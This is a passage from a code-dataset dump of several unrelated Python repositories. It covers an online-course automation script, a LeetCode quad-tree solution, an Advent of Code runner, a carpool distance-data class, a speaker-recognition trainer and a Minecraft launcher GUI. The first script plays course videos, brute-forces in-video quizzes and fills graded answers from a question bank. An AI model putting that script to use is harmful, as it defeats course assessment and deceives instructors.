WebDriver.find_element_by_class_name('vjs-duration-display').get_attribute('textContent')\n now = WebDriver.find_element_by_class_name('vjs-current-time-display').get_attribute('textContent') \n print('已播放{}/{}'.format(now,duration))\n return duration == now\ndef ProbleminVideo(WebDriver) :\n '''\n 处理视频中的题\n '''\n ProblemChoices = WebDriver.find_elements_by_name('ans-videoquiz-opt')\n SubmitAnswer = WebDriver.find_element_by_class_name('ans-videoquiz-submit')\n print('发现视频中题')\n for i in range(len(ProblemChoices)) :\n print('正在尝试第{}个选项'.format(i+1))\n ProblemChoices = WebDriver.find_elements_by_name('ans-videoquiz-opt')\n ProblemChoices[i].click() \n time.sleep(2)\n SubmitAnswer.click()\n time.sleep(2)\n alert = WebDriver.switch_to.alert\n alert.accept()\ndef FindProblems(WebDriver) :\n '''\n 匹配所有题目的题干,返回一个题目列表\n '''\n text = WebDriver.find_elements_by_css_selector('.Zy_TItle')\n problems = []\n for i in range(len(text)) :\n ProblemText = text[i].get_attribute('textContent')\n try :\n ProblemText = 
FindProblemText.findall(ProblemText)[0]\n except :\n ProblemText = FindChineseText.findall(ProblemText)[0]\n ProblemText = ProblemText.lstrip('】').rstrip('(').rstrip('?').rstrip('。').rstrip('(')\n problems.append(ProblemText)\n return problems\ndef FindAnswer(problem) :\n '''\n 在题库中寻找题目的答案并返回\n '''\n j = 0\n for i in range(6805):\n words = str(lines[i].decode('utf-8'))\n if problem[2:-2]in words:\n j = i\n break\n while True :\n words = str(lines[j].decode('utf-8'))\n if daan in words :\n for char in words :\n if char in answers:\n return char\n break\n else:\n j += 1\ndef FindProblemChoices(WebDriver) :\n '''\n 寻找所有选项,返回一个字典\n '''\n AllChoices = {'A':[],'B':[],'C':[],'D':[],'':[],'×':[]}\n AllInput = WebDriver.find_elements_by_tag_name('input')\n for AInput in AllInput :\n ChoiceValue = AInput.get_attribute('value')\n if ChoiceValue =='true':\n ChoiceValue = '√'\n elif ChoiceValue == 'false':\n ChoiceValue = '×'\n try :\n AllChoices[ChoiceValue].append(AInput)\n except :\n pass\n return AllChoices\ndef AnswerProblem(num,answer,choices,WebDriver) :\n '''\n 回答问题,三个参数:题号,答案,存储所有选项的字典\n '''\n target = choices[answer][num]\n WebDriver.execute_script(\"arguments[0].scrollIntoView();\",target)\n target.click()\n print('第{}题,选择{}'.format(num+1,answer))\ndef SubmitAnswer(WebDriver) :\n '''\n 提交答案\n '''\n SubmitButton = WebDriver.find_element_by_css_selector('.Btn_blue_1')\n SubmitButton.click()\n moveup = webdriver.ActionChains(WebDriver)\n moveup.send_keys(Keys.PAGE_UP)\n moveup.perform()\n time.sleep(2)\n confirm = WebDriver.find_element_by_class_name('bluebtn ')\n confirm.click()\ndef FindFile(WebDriver) :\n '''\n 寻找所有文件的object id\n '''\n FileFrames = WebDriver.find_elements_by_tag_name('iframe')\n Files = [i.get_attribute('objectid') for i in FileFrames]\n return Files\ndef FindAudio(WebDriver):\n '''\n 音频任务\n '''\n AudioList = []\n AudioClassName = 'ans-insertaudio'\n frames = WebDriver.find_elements_by_tag_name('iframe')\n for i in range(len(frames)):\n frames = WebDriver.find_elements_by_tag_name('iframe')\n classname = frames[i].get_attribute('class')\n if AudioClassName in classname :\n AudioList.append(frames[i])\n return AudioList\ndef PlayAudio(WebDriver):\n PlayButtion = WebDriver.find_element_by_class_name('vjs-play-control')\n PlayButtion.click()","repo_name":"Zhurp2020/AutoStudy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9417,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"38901243371","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 427.py\n# @Time : 2020/7/29 9:57 上午\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Node:\n def __init__(self, val, isLeaf, topLeft, topRight, bottomLeft, bottomRight):\n self.val = val\n self.isLeaf = isLeaf\n self.topLeft = topLeft\n self.topRight = topRight\n self.bottomLeft = bottomLeft\n self.bottomRight = bottomRight\n\nclass Solution:\n \"\"\"\n [427. 
建立四叉树](https://leetcode-cn.com/problems/construct-quad-tree/)\n \"\"\"\n @timeit\n def construct(self, grid: List[List[int]]) -> 'Node':\n def ok(i, j, s):\n return sum(grid[i+x][j+y] for x in range(s) for y in range(s)) in {0, s*s}\n def f(i, j, s):\n if s == 1 or ok(i, j, s): return Node(grid[i][j], True, None, None, None, None)\n t = s // 2\n NW, NE, SW, SE = f(i, j, t), f(i, j+t, t), f(i+t, j, t), f(i+t, j+t, t)\n return Node(1, False, NW, NE, SW, SE)\n n = len(grid)\n return f(0, 0, n)\n\nif __name__ == '__main__':\n a = Solution()\n grid = [[1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0]]\n","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/301-600/427.py","file_name":"427.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"69840796411","text":"#!/bin/env python3\n\nimport argparse\nimport importlib\n\ndef main():\n parser = argparse.ArgumentParser(description='Run day scripts')\n parser.add_argument('day', type=str, help='Day number')\n\n args = parser.parse_args()\n day = 'day'+args.day.rjust(2, '0')\n\n try:\n lib = importlib.import_module(day+'.script')\n lib.run()\n except ModuleNotFoundError:\n print(\"Day\",day,\"not found\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"hermzz/advent","sub_path":"advent2019/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14795456595","text":"import csv\r\nimport numpy as np\r\nimport torch\r\n\r\n\r\n# save coordinates to file readable by Google My Maps\r\ndef save_coordinates(fname, coords, ids=None, extras=None):\r\n if extras is None:\r\n extras = ['' for i in range(len(coords))]\r\n\r\n if ids is None:\r\n ids = [i for i in range(len(coords))]\r\n\r\n with open(fname, 'w', newline='') as file:\r\n writer = csv.writer(file, delimiter=',')\r\n writer.writerow(['latitude', 'longitude', 'id', 'extras'])\r\n for i in range(len(coords)):\r\n writer.writerow([str(coords[i][0]), str(coords[i][1]), str(ids[i]), str(extras[i])])\r\n\r\n\r\n# load map coordinates from file\r\ndef load_coordinates(fname):\r\n with open(fname, 'r', encoding='utf8') as file:\r\n reader = csv.DictReader(file, delimiter=',')\r\n coords = [[float(row['latitude']), float(row['longitude'])] for row in reader]\r\n\r\n return coords\r\n\r\n\r\n# load a distance matrix from file\r\ndef load_matrix(fname):\r\n dist = []\r\n with open(fname, 'r', encoding='utf8') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n dist.append([float(d) for d in row])\r\n\r\n return dist\r\n\r\n\r\nclass CarpoolDataManager:\r\n \"\"\"\r\n A class that manages the data needed for carpooling purposes.\r\n It contains a set of coordinates and their distances and can sample from them,\r\n normalize the data and make submatrices of the initial data if needed.\r\n \"\"\"\r\n def set_data(self):\r\n # initializes the class fields\r\n\r\n self.d_min = np.min(self.dist[self.dist > 0])\r\n self.d_max = np.max(self.dist)\r\n\r\n self.lat_max = np.max(self.coords[:, 0])\r\n self.lat_min = np.min(self.coords[:, 0])\r\n\r\n self.long_max = np.max(self.coords[:, 1])\r\n self.long_min = np.min(self.coords[:, 1])\r\n\r\n coords_n = self.coords.copy()\r\n coords_n[:, 
0] = (coords_n[:, 0] - self.lat_min) / \\\r\n (self.lat_max - self.lat_min)\r\n coords_n[:, 1] = (coords_n[:, 1] - self.long_min) / \\\r\n (self.long_max - self.long_min)\r\n\r\n self.ids = {}\r\n for i in range(len(self.coords)):\r\n self.ids[(self.coords[i][0], self.coords[i][1])] = i\r\n self.ids[(coords_n[i][0], coords_n[i][1])] = i\r\n\r\n def __init__(self, dist_fname, coords_fname):\r\n \"\"\"\r\n Args:\r\n dist_fname (string): distance matrix file that specifies the distances between map coordinates\r\n coords_fname (string): file with map coordinates\r\n \"\"\"\r\n self.dist_fname = dist_fname\r\n self.coords_fname = coords_fname\r\n\r\n self.dist = load_matrix(self.dist_fname)\r\n self.coords = load_coordinates(self.coords_fname)\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n self.set_data()\r\n\r\n def reset_data(self):\r\n # resets the class fields\r\n\r\n self.dist = load_matrix(self.dist_fname)\r\n self.coords = load_coordinates(self.coords_fname)\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n self.set_data()\r\n\r\n def filter_data(self, max_range, idx_goal):\r\n # filter coordinates so that the class contains only those that are within a certain range from a specific\r\n # point indexed by idx_goal in the distance matrix\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n if max_range is None or idx_goal is None:\r\n return\r\n\r\n idxs = np.argwhere(self.dist[:, idx_goal] <= max_range)[:, 0]\r\n\r\n dist_new = np.zeros([len(idxs), len(idxs)], dtype=self.dist.dtype)\r\n k = 0\r\n for i in idxs:\r\n dist_new[k, :] = self.dist[i, idxs]\r\n k += 1\r\n\r\n self.dist = dist_new\r\n self.coords = self.coords[idxs].copy()\r\n\r\n self.set_data()\r\n\r\n def pts2ids(self, points):\r\n ids = [self.ids[p[0], p[1]] for p in points]\r\n return ids\r\n\r\n def ids2pts(self, ids):\r\n return self.coords[ids].copy()\r\n\r\n def distances_ids(self, ids):\r\n # return the distances of some points indexed by ids\r\n\r\n n = len(ids)\r\n sample_dist = np.zeros([n, n])\r\n sample_coords = self.coords[ids, :].copy()\r\n k = 0\r\n for i in ids:\r\n sample_dist[k, :] = self.dist[i, ids]\r\n k += 1\r\n return sample_dist, sample_coords\r\n\r\n def distances_pts(self, points):\r\n n = len(points)\r\n ids = self.pts2ids(points)\r\n dist = np.zeros([n, n])\r\n k = 0\r\n for i in ids:\r\n dist[k, :] = self.dist[i, ids]\r\n k += 1\r\n return dist\r\n\r\n def sample_data(self, num_points, idx_goal=None, seed=None, calculate_dist=True):\r\n # sample some random carpool data\r\n\r\n if seed is not None:\r\n np.random.seed(seed)\r\n\r\n ids = np.arange(len(self.coords), dtype=np.uint32)\r\n\r\n np.random.shuffle(ids)\r\n if idx_goal is not None:\r\n idx = (ids == idx_goal)\r\n ids[idx], ids[0] = ids[0], ids[idx]\r\n\r\n r_ids = ids[:num_points]\r\n\r\n sample_coords = self.ids2pts(r_ids)\r\n\r\n sample_dist = None\r\n if calculate_dist:\r\n sample_dist = np.zeros([num_points, num_points], dtype=self.dist.dtype)\r\n k = 0\r\n for i in r_ids:\r\n sample_dist[k, :] = self.dist[i, r_ids]\r\n k += 1\r\n\r\n return sample_coords, r_ids, sample_dist\r\n\r\n def normalize(self, points):\r\n points_n = np.asarray(points, dtype=np.float32).copy()\r\n if points_n.ndim == 1:\r\n points_n[0] = (points_n[0] - self.lat_min) / (self.lat_max - self.lat_min)\r\n points_n[1] = (points_n[1] - 
self.long_min) / (self.long_max - self.long_min)\r\n else:\r\n points_n[:, 0] = (points_n[:, 0] - self.lat_min) / (self.lat_max - self.lat_min)\r\n points_n[:, 1] = (points_n[:, 1] - self.long_min) / (self.long_max - self.long_min)\r\n\r\n return points_n\r\n\r\n def denormalize(self, points):\r\n _points = np.asarray(points, dtype=np.float32).copy()\r\n if _points.ndim == 1:\r\n _points[0] = _points[0] * (self.lat_max - self.lat_min) + self.lat_min\r\n _points[1] = _points[1] * (self.long_max - self.long_min) + self.long_min\r\n else:\r\n _points[:, 0] = _points[:, 0] * (self.lat_max - self.lat_min) + self.lat_min\r\n _points[:, 1] = _points[:, 1] * (self.long_max - self.long_min) + self.long_min\r\n\r\n return _points\r\n\r\n def tensor_distance_2_pts(self, p1, p2):\r\n id1 = self.ids[p1[0].item(), p1[1].item()]\r\n id2 = self.ids[p2[0].item(), p2[1].item()]\r\n\r\n d = self.dist[id1][id2]\r\n\r\n return d\r\n\r\n def tensor_pts2ids(self, points):\r\n ids = [self.ids[p[0].item(), p[1].item()] for p in points]\r\n return ids\r\n\r\n def tensor_distances(self, t1, t2):\r\n t_size = len(t1)\r\n dist = [self.tensor_distance_2_pts(t1[i], t2[i]) for i in range(t_size)]\r\n dist = torch.tensor(dist, dtype=torch.float32)\r\n\r\n return dist\r\n\r\n def tensor_distances_ids(self, ids1, ids2):\r\n t_size = len(ids1)\r\n dist = [self.dist[ids1[i], ids2[i]] for i in range(t_size)]\r\n dist = torch.tensor(dist, dtype=torch.float32)\r\n\r\n return dist\r\n\r\n\r\nif __name__ == '__main__':\r\n coords_fname = 'map_data/carpool_map_coordinates.csv'\r\n dist_fname = 'map_data/distance_matrix.csv'\r\n\r\n mgr = CarpoolDataManager(dist_fname, coords_fname)\r\n mgr.filter_data(3000, idx_goal=0)\r\n\r\n coords, ids, dist = mgr.sample_data(20, idx_goal=0)\r\n\r\n mgr.reset_data()","repo_name":"giabarbou/qlearning_carpool","sub_path":"carpool_data.py","file_name":"carpool_data.py","file_ext":"py","file_size_in_byte":7849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42657551299","text":"import logging\nimport os\nimport time\n\nimport tensorflow as tf\nfrom keras.callbacks import TensorBoard\nfrom keras.losses import categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\nfrom keras.optimizers import Adam\n\nfrom data_generators.base_data_generator import BaseBatchGenerator\nfrom models.deep_voice_speaker_model import deep_voice_speaker_model\nfrom utils.utils import SaverCallback, LoggingCallback, mkdir\nfrom keras.models import load_model\n\n\ndef train(inp_shape, train_batch_generator, val_batch_generator=None,\n init_lr=0.001, epochs=1000, steps_per_epoch=20, val_steps=20, workers=4, runs_dir=None, **kwargs):\n if runs_dir is None:\n runs_dir = 'deep_voice_' + str(int(time.time()))\n mkdir(runs_dir, True)\n model = deep_voice_speaker_model(inp_shape, **kwargs)\n opt = Adam(lr=init_lr)\n model.compile(optimizer=opt, loss=categorical_crossentropy, metrics=[categorical_accuracy])\n logging.info(model.summary())\n tb_callback = TensorBoard(log_dir=os.path.join(runs_dir, 'logs'), write_images=True)\n lc = LoggingCallback()\n sc = SaverCallback(saver=tf.train.Saver(max_to_keep=20, keep_checkpoint_every_n_hours=0.5),\n save_path=runs_dir,\n model=model, name='deep_voice_cnn')\n model.fit_generator(train_batch_generator, steps_per_epoch=steps_per_epoch,\n epochs=epochs, workers=workers, callbacks=[tb_callback, lc, sc],\n validation_data=val_batch_generator, validation_steps=val_steps,\n verbose=0)\n\n\ndef main(_):\n 
mkdir(os.path.join(FLAGS.runs_dir, \"training-log.txt\"))\n logging.basicConfig(level=logging.INFO, filename=os.path.join(FLAGS.runs_dir, \"training-log.txt\"),\n format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.info(FLAGS.__dict__)\n # logging.basicConfig(level=logging.INFO)\n\n \"\"\"\n paper : Deep Voice 2: Multi-Speaker Neural Text-to-SpeechA\n focus : Speaker Discriminative Model\n url : https://arxiv.org/pdf/1705.08947.pdf\n \"\"\"\n\n num_speakers = FLAGS.num_speakers\n pkl_dir = FLAGS.pkl_dir\n data_gen = BaseBatchGenerator(FLAGS.data_path, num_speakers=num_speakers,\n frames=FLAGS.frames, id=FLAGS.id, pkl_dir=pkl_dir)\n train(inp_shape=(data_gen.frames, data_gen.dim, 1), train_batch_generator=data_gen.generator('train'),\n num_speakers=num_speakers, conv_rep=FLAGS.conv_rep, dropout=FLAGS.dp, steps_per_epoch=FLAGS.steps_per_epoch,\n val_batch_generator=data_gen.generator('dev'), val_steps=FLAGS.val_steps, runs_dir=FLAGS.runs_dir)\n\n\nif __name__ == '__main__':\n flags = tf.app.flags\n FLAGS = flags.FLAGS\n # /Users/venkatesh/datasets/timit/data/lisa/data/timit/raw/TIMIT/TRAIN\n flags.DEFINE_string('runs_dir', \"/Users/venkatesh/datasets/timit/data/lisa/data/timit/raw/TIMIT/TRAIN\",\n 'Runs path for tensorboard')\n flags.DEFINE_string('data_path', \"\", 'Dataset path')\n flags.DEFINE_integer('num_speakers', 200, 'Number of speakers')\n flags.DEFINE_integer('frames', 64, 'Number of frames')\n flags.DEFINE_integer('conv_rep', 5, 'Number of conv layers')\n flags.DEFINE_integer('steps_per_epoch', 200, 'Steps for epoch')\n flags.DEFINE_integer('val_steps', 100, 'Validation steps')\n flags.DEFINE_float('dp', 0.0, 'Dropout')\n flags.DEFINE_string('pkl_dir', \"\", 'Temporary directory to store input data')\n flags.DEFINE_string('id', \"TIMIT\", 'Corpus identifier')\n tf.app.run()\n","repo_name":"venkatesh-1729/DeepSpeaker","sub_path":"trainers/deep_voice_trainer.py","file_name":"deep_voice_trainer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71856793531","text":"from PyQt6.QtWidgets import QWidget, QTableWidget, QTableWidgetItem, QVBoxLayout, QHBoxLayout, QGridLayout, QPlainTextEdit, QTabWidget, QAbstractItemView, QHeaderView, QPushButton, QComboBox, QProgressBar, QLabel, QCheckBox, QMenu, QLineEdit, QSizePolicy, QMessageBox\nfrom PyQt6.QtCore import QUrl, QLocale, Qt, QProcess, QCoreApplication\nfrom PyQt6.QtWebEngineWidgets import QWebEngineView\nfrom PyQt6.QtWebEngineCore import QWebEngineProfile\nfrom PyQt6.QtGui import QCursor, QAction, QIcon, QContextMenuEvent, QCloseEvent\nfrom jdMinecraftLauncher.gui.ProfileWindow import ProfileWindow\nfrom jdMinecraftLauncher.Profile import Profile\nfrom jdMinecraftLauncher.Shortcut import canCreateShortcuts, askCreateShortcut\nfrom jdMinecraftLauncher.Functions import openFile, getAccountDict\nfrom jdMinecraftLauncher.InstallThread import InstallThread\nfrom jdMinecraftLauncher.RunMinecraft import getMinecraftCommand\nfrom jdMinecraftLauncher.Environment import Environment\nfrom jdMinecraftLauncher.Languages import getLanguageNames\nimport minecraft_launcher_lib\nfrom typing import List\nimport urllib.parse\nimport webbrowser\nimport platform\nimport tempfile\nimport random\nimport shutil\nimport json\nimport sys\nimport os\n\n\nclass ProfileEditorTab(QTableWidget):\n def __init__(self, env: Environment, mainwindow: \"MainWindow\"):\n super().__init__(0,2)\n self.env = env\n self.mainWindow = mainwindow\n 
self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Profile Name\"), QCoreApplication.translate(\"MainWindow\", \"Minecraft Version\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.verticalHeader().hide()\n self.setShowGrid(False)\n self.updateProfiles()\n\n def updateProfiles(self):\n while self.rowCount() > 0:\n self.removeRow(0)\n count = 0\n for i in self.env.profileCollection.profileList:\n nameItem = QTableWidgetItem(i.name)\n nameItem.setFlags(nameItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n if i.useLatestVersion:\n versionItem = QTableWidgetItem(QCoreApplication.translate(\"MainWindow\", \"(Latest version)\"))\n elif i.useLatestSnapshot:\n versionItem = QTableWidgetItem(QCoreApplication.translate(\"MainWindow\", \"(Latest snapshot)\"))\n else:\n versionItem = QTableWidgetItem(i.version)\n versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n self.insertRow(count)\n self.setItem(count, 0, nameItem) \n self.setItem(count, 1, versionItem) \n count += 1\n\n def contextMenuEvent(self, event: QContextMenuEvent):\n self.menu = QMenu(self)\n\n addProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Add Profile\"), self)\n addProfile.triggered.connect(self.addProfile)\n self.menu.addAction(addProfile)\n \n editProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Edit Profile\"), self)\n editProfile.triggered.connect(self.editProfile)\n self.menu.addAction(editProfile)\n\n copyProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Copy Profile\"), self)\n copyProfile.triggered.connect(self.copyProfile)\n self.menu.addAction(copyProfile)\n\n removeProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Remove Profile\"), self)\n removeProfile.triggered.connect(self.removeProfile)\n self.menu.addAction(removeProfile)\n\n openGameFolder = QAction(QCoreApplication.translate(\"MainWindow\", \"Open Game Folder\"), self)\n openGameFolder.triggered.connect(lambda: openFile(self.env.profileCollection.profileList[self.currentRow()].getGameDirectoryPath()))\n self.menu.addAction(openGameFolder)\n\n if canCreateShortcuts():\n createShortcut = QAction(QCoreApplication.translate(\"MainWindow\", \"Create Shortcut\"), self)\n createShortcut.triggered.connect(lambda: askCreateShortcut(self.env, self.env.profileCollection.profileList[self.currentRow()]))\n self.menu.addAction(createShortcut)\n\n self.menu.popup(QCursor.pos())\n\n def addProfile(self):\n self.mainWindow.profileWindow.loadProfile(Profile(QCoreApplication.translate(\"MainWindow\", \"New Profile\"), self.env), True)\n self.mainWindow.profileWindow.exec()\n\n def editProfile(self):\n self.mainWindow.profileWindow.loadProfile(self.env.profileCollection.profileList[self.currentRow()],False)\n self.mainWindow.profileWindow.exec()\n\n def copyProfile(self):\n self.mainWindow.profileWindow.loadProfile(self.env.profileCollection.profileList[self.currentRow()], True, True)\n self.mainWindow.profileWindow.exec()\n\n def removeProfile(self):\n if len(self.env.profileCollection.profileList) == 1:\n QMessageBox.critical(self.mainWindow, QCoreApplication.translate(\"MainWindow\", \"Can't delete Profile\"), QCoreApplication.translate(\"MainWindow\", \"You can't delete all Profiles. 
At least one Profile must stay.\"))\n else:\n del self.env.profileCollection.profileList[self.currentRow()]\n self.env.selectedProfile = self.env.profileCollection.profileList[0].id\n self.mainWindow.updateProfileList()\n\nclass VersionEditorTab(QTableWidget):\n def __init__(self, env: Environment):\n super().__init__(0, 2)\n self.env = env\n\n self.uninstallVersion = QAction(QCoreApplication.translate(\"MainWindow\", \"Uninstall Version\"), self)\n self.uninstallVersion.triggered.connect(self.uninstallVersionClicked)\n\n self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Minecraft Version\"), QCoreApplication.translate(\"MainWindow\", \"Version Type\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.verticalHeader().hide()\n self.setShowGrid(False)\n self.updateVersions()\n\n def updateVersions(self):\n if len(self.env.installedVersion) == 0:\n self.uninstallVersion.setEnabled(False)\n else:\n self.uninstallVersion.setEnabled(True)\n while self.rowCount() > 0:\n self.removeRow(0)\n count = 0\n for i in self.env.installedVersion:\n idItem = QTableWidgetItem(i[\"id\"])\n idItem.setFlags(idItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n typeItem = QTableWidgetItem(i[\"type\"])\n typeItem.setFlags(typeItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n self.insertRow(count)\n self.setItem(count, 0, idItem) \n self.setItem(count, 1, typeItem) \n count += 1\n\n def contextMenuEvent(self, event: QContextMenuEvent):\n self.menu = QMenu(self)\n\n self.menu.addAction(self.uninstallVersion)\n\n self.menu.popup(QCursor.pos())\n\n def uninstallVersionClicked(self):\n shutil.rmtree(os.path.join(self.env.minecraftDir, \"versions\", self.env.installedVersion[self.currentRow()][\"id\"]))\n del self.env.installedVersion[self.currentRow()]\n self.updateVersions()\n\nclass OptionsTab(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n self.env = env\n\n self.languageComboBox = QComboBox()\n self.urlEdit = QLineEdit()\n self.allowMultiLaunchCheckBox = QCheckBox(QCoreApplication.translate(\"MainWindow\", \"Allow starting multiple instances (not recommended)\"))\n self.extractNativesCheckBox = QCheckBox(QCoreApplication.translate(\"MainWindow\", \"Unpack natives separately for each instance\"))\n\n languageNames = getLanguageNames()\n self.languageComboBox.addItem(QCoreApplication.translate(\"MainWindow\", \"Use System Language\"), \"default\")\n self.languageComboBox.addItem(languageNames.get(\"en\", \"en\"), \"en\")\n for i in os.listdir(os.path.join(env.currentDir,\"translations\")):\n if not i.endswith(\".qm\"):\n continue\n\n lang = i.removeprefix(\"jdMinecraftLauncher_\").removesuffix(\".qm\")\n self.languageComboBox.addItem(languageNames.get(lang, lang), lang)\n\n for i in range(self.languageComboBox.count()):\n if self.languageComboBox.itemData(i) == env.settings.get(\"language\"):\n self.languageComboBox.setCurrentIndex(i)\n\n self.urlEdit.setText(env.settings.get(\"newsURL\"))\n self.allowMultiLaunchCheckBox.setChecked(self.env.settings.get(\"enableMultiLaunch\"))\n self.extractNativesCheckBox.setChecked(self.env.settings.get(\"extractNatives\"))\n\n self.allowMultiLaunchCheckBox.stateChanged.connect(self.multiLaunchCheckBoxChanged)\n 
self.extractNativesCheckBox.stateChanged.connect(self.extractNativesCheckBoxChanged)\n\n gridLayout = QGridLayout()\n gridLayout.addWidget(QLabel(QCoreApplication.translate(\"MainWindow\", \"Language:\")), 0, 0)\n gridLayout.addWidget(self.languageComboBox,0,1)\n gridLayout.addWidget(QLabel(QCoreApplication.translate(\"MainWindow\", \"News URL:\")),1,0)\n gridLayout.addWidget(self.urlEdit,1,1)\n\n mainLayout = QVBoxLayout()\n mainLayout.addLayout(gridLayout)\n mainLayout.addWidget(self.allowMultiLaunchCheckBox)\n mainLayout.addWidget(self.extractNativesCheckBox)\n mainLayout.addStretch(1)\n \n self.setLayout(mainLayout)\n\n def multiLaunchCheckBoxChanged(self):\n self.env.settings.set(\"enableMultiLaunch\", self.allowMultiLaunchCheckBox.isChecked())\n\n def extractNativesCheckBoxChanged(self):\n self.env.settings.set(\"extractNatives\", self.extractNativesCheckBox.isChecked())\n\nclass ForgeTab(QTableWidget):\n def __init__(self, env: Environment, mainWindow: \"MainWindow\"):\n self.env = env\n self.mainWindow = mainWindow\n super().__init__(0,2)\n\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.horizontalHeader().hide()\n self.verticalHeader().hide()\n\n count = 0\n minecraft_version_check = {}\n\n try:\n forgeVersionList = minecraft_launcher_lib.forge.list_forge_versions()\n except Exception:\n print(\"Could not get Forge Versions\", file=sys.stderr)\n return\n\n for i in forgeVersionList:\n minecraft_version, _ = i.split(\"-\", 1)\n\n if minecraft_version in minecraft_version_check or not minecraft_launcher_lib.forge.supports_automatic_install(i):\n continue\n\n minecraft_version_check[minecraft_version] = True\n\n versionItem = QTableWidgetItem(i)\n versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n\n installButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Install\"))\n\n installButton.clicked.connect(self.installButtonClicked)\n\n self.insertRow(count)\n self.setItem(count, 0, versionItem)\n self.setCellWidget(count, 1, installButton)\n\n count += 1\n\n def installForgeVersion(self, forgeVersion: str):\n self.mainWindow.installThread.setupForgeInstallation(forgeVersion)\n self.mainWindow.installThread.start()\n\n self.mainWindow.setInstallButtonsEnabled(False)\n\n def installButtonClicked(self):\n for i in range(self.rowCount()):\n if self.cellWidget(i, 1) == self.sender():\n self.installForgeVersion(self.item(i, 0).text())\n return\n\n def setButtonsEnabled(self, enabled: bool):\n for i in range(self.rowCount()):\n self.cellWidget(i, 1).setEnabled(enabled)\n\n\nclass FabricTab(QTableWidget):\n def __init__(self, env: Environment, mainWindow: \"MainWindow\"):\n self.env = env\n self.mainWindow = mainWindow\n super().__init__(0,2)\n\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.horizontalHeader().hide()\n self.verticalHeader().hide()\n\n try:\n fabricVersionList = minecraft_launcher_lib.fabric.get_all_minecraft_versions()\n except Exception:\n print(\"Could not get Fabric Versions\", file=sys.stderr)\n return\n\n count = 0\n for i in fabricVersionList:\n if not i[\"stable\"]:\n continue\n\n versionItem = QTableWidgetItem(i[\"version\"])\n 
